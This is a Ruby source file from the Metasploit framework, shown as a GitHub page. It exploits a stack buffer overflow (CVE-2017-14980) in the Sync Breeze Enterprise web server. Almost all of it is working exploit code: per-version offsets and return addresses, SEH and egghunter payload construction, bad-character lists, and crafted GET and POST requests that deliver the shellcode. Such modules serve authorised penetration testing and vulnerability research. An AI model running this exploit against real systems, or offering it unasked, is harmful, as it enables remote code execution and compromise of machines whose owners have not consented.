-
Notifications
You must be signed in to change notification settings - Fork 13.8k
/
syncbreeze_bof.rb
207 lines (184 loc) · 5.39 KB
/
syncbreeze_bof.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sync Breeze Enterprise GET Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28,
and v10.1.16, caused by improper bounds checking of the request in
HTTP GET and POST requests sent to the built-in web server. This
module has been tested successfully on Windows 7 SP1 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira',
'Andrew Smith', # MSF support for v10.0.28
'Owais Mehtab', # Original v10.0.28 exploit
'Milton Valencia (wetw0rk)' # MSF support for v10.1.16
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x09\x0a\x0d\x20\x26",
'Space' => 500
},
'References' =>
[
[ 'CVE', '2017-14980' ],
],
'Targets' =>
[
[
'Automatic', {}
],
[ 'Sync Breeze Enterprise v9.4.28',
{
'Offset' => 2488,
'Ret' => 0x10015fde # POP # POP # RET [libspp.dll]
}
],
[ 'Sync Breeze Enterprise v10.0.28',
{
'Offset' => 780,
'Ret' => 0x10090c83 # JMP ESP [libspp.dll]
}
],
[ 'Sync Breeze Enterprise v10.1.16',
{
'Offset' => 2495,
'Ret' => 0x1001C65C # POP # POP # RET [libspp.dll]
}
]
],
'Privileged' => true,
'DisclosureDate' => '2017-03-15',
'DefaultTarget' => 0))
end
def get_product_name
res = send_request_cgi(
'method' => 'GET',
'uri' => '/'
)
if res && res.code == 200
product_name = res.body.scan(/(Sync Breeze Enterprise v[^<]*)/i).flatten.first
return product_name if product_name
end
nil
end
def check
product_name = get_product_name
return Exploit::CheckCode::Unknown unless product_name
if product_name =~ /9\.4\.28/ || product_name =~ /10\.0\.28/
return Exploit::CheckCode::Appears
elsif product_name =~ /Sync Breeze Enterprise/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def get_target_name
if target.name != 'Automatic'
print_status("Target manually set as #{target.name}")
return target
else
print_status('Automatically detecting target...')
end
case get_product_name
when /9\.4\.28/
print_status('Target is 9.4.28')
return targets[1]
when /10\.0\.28/
print_status('Target is 10.0.28')
return targets[2]
when /10\.1\.16/
print_status('Target is 10.1.16')
return targets[3]
else
nil
end
end
def exploit
tmp_target = target
case get_target_name
when targets[1]
target = targets[1]
eggoptions = {
checksum: true,
eggtag: rand_text_alpha(4, payload_badchars)
}
hunter, egg = generate_egghunter(
payload.encoded,
payload_badchars,
eggoptions
)
sploit = rand_text_alpha(target['Offset'])
sploit << generate_seh_record(target.ret)
sploit << hunter
sploit << make_nops(10)
sploit << egg
sploit << rand_text_alpha(5500)
print_status('Sending request...')
send_request_cgi(
'method' => 'GET',
'uri' => sploit
)
when targets[2]
target = targets[2]
uri = "/login"
sploit = rand_text_alpha(target['Offset'])
sploit << [target.ret].pack('V')
sploit << rand_text(4)
make_nops(10)
sploit << payload.encoded
print_status('Sending request...')
send_request_cgi(
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'username' => "#{sploit}",
'password' => "rawr"
}
)
when targets[3]
target = targets[3]
eggoptions = {
checksum: true,
eggtag: rand_text_alpha(4, payload_badchars)
}
hunter, egg = generate_egghunter(
payload.encoded,
payload_badchars,
eggoptions
)
sploit = payload.encoded
sploit << rand_text_alpha(target['Offset'] - payload.encoded.length, payload_badchars)
sploit << generate_seh_record(target.ret)
sploit << hunter
# Push the payload out of this buffer, which will make the hunter look for the payload
# somewhere else that has the complete payload.
sploit << make_nops(200)
sploit << egg
sploit << rand_text_alpha(9067 - sploit.length, payload_badchars)
send_request_cgi(
'uri' => "/#{sploit}",
'method' => 'GET'
)
else
print_error("Exploit not suitable for this target.")
end
ensure
target = tmp_target
end
end